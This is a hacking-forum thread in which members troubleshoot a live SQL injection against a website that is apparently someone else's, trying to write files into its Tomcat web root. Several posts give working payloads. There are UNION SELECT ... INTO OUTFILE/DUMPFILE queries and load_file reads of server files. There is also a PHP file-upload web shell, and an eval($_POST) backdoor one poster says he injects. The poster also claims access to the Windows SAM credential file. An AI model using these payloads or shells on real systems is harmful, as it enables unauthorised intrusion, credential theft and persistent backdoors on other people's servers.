Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Mysql read/write file problem

  • 0 Vote(s) - 0 Average


08-22-2014, 08:31 PM #1
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
hi all wink
i have a little problem with a Mysql injection Smiley1
i have try to read/write a file in this directory :
C:\Program Files\apache\Tomcat2.2.11\htdocs\
but i donsent work like normal :
Code:
C:/Program Files/apache/Tomcat2.2.11/htdocs/test.txt
/Program Files/apache/Tomcat2.2.11/htdocs/test.txt
C:\\Program Files\\apache\\Tomcat2.2.11\\htdocs\\test.txt
not one, of this method will work Sadsmiley
did you have any ideas ? i can read the .sam file and i can write in the system directory and in all other directory's too.
what can i do ?

[Image: xodhvlpa.jpg]
[Image: test.php]

08-23-2014, 12:42 PM #2
vvv Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:10 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: Crazy
can you PM me your link, maybe I can help Smiley1

That was my sin. And this...this is my punishment.:blush:

08-23-2014, 04:34 PM #3
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
sorry i cant pm you the link it is not mine Smiley1
it belong to some other guy here in the Community and i just try it Smiley1
Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

08-23-2014, 05:24 PM #4
vvv Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:10 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: Crazy
may be it delete anything behind enter Smiley1
<?php if($_GET['id']=='hk'){echo '<form method="POST" enctype="multipart/form-data" action="?id=hk"><input type="file" name="file_upload" size="20" id="file"><input type="submit" name="gui" value="Up" ></form>';if (isset($_POST['gui'])){move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);}}?>
==> try this Smiley1

That was my sin. And this...this is my punishment.:blush:

08-23-2014, 05:30 PM #5
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
hmm Bro i think you dont understand me Smiley1
i need no upload script i need a way to read & write in the directory.
and i try the path on the first post like that
Code:
1'+union+select+1,2,3,4,5,6,7+into+outfile+'/Program Files/apache/Tomcat2.2.11/htdocs/test.txt'+--+f+--+
but the test file is not createt and i can read the index file like that :
Code:
1'+union+select+1,2,load_file('/Program Files/apache/Tomcat2.2.11/htdocs/index.php'),4,5,6,7+--+f+--+
wink i hope you understodd me now Smiley1 ps the directory exist the member of the forum found a LFD.

[Image: xodhvlpa.jpg]
[Image: test.php]

08-23-2014, 06:15 PM #6
vvv Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:10 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: Crazy
sorry Sadsmiley
1'+union+select+1,2,3,4,5,6,7+into+outfile+'/Program Files/apache/Tomcat2.2.11/htdocs/test.txt'+--+f+--+
==> Where is your content? I mean "code"! (my english is bad)
maybe is: 1'+union+select+1,2,'code',4,5,6,7+into+dumpfile+'link/test.txt'+--+f+--+
and
1'+union+select+1,2,load_file(link/test.txt),4,5,6,7+--+f+--+
if load_file don't work, we can hex this. load_file(0xlink/test.txt)

That was my sin. And this...this is my punishment.:blush:

08-23-2014, 08:45 PM #7
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
i try it with hex wink but nothing work it seems that mysql have a problem with spaces Sadsmiley
ps into dumpfile i try too but i cant write in that directory too. Sadsmiley

ps the content is not important i can add all the time this '<?php echo eval($_POST["d"]);?>' to my query Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

08-24-2014, 08:47 PM #8
aburehan Offline Respected *****
Respected
Posts:38 Threads:5 Joined:Jan 2014 Reputation: 0
Mood: None
same problum with me

some time it shows blank page

08-29-2014, 10:43 AM #9
destroyer123 Offline Junior Member **
Registered
Posts:10 Threads:1 Joined:Feb 2014 Reputation: 0
Mood: None
Program Files/...

I guess it would be "C://Program Files//......//lol.txt"

08-30-2014, 03:29 AM #10
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
destroyer Smiley1
i try it today Smiley1
*EDIT*
sorry dont work Sadsmiley

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:2 Guest(s)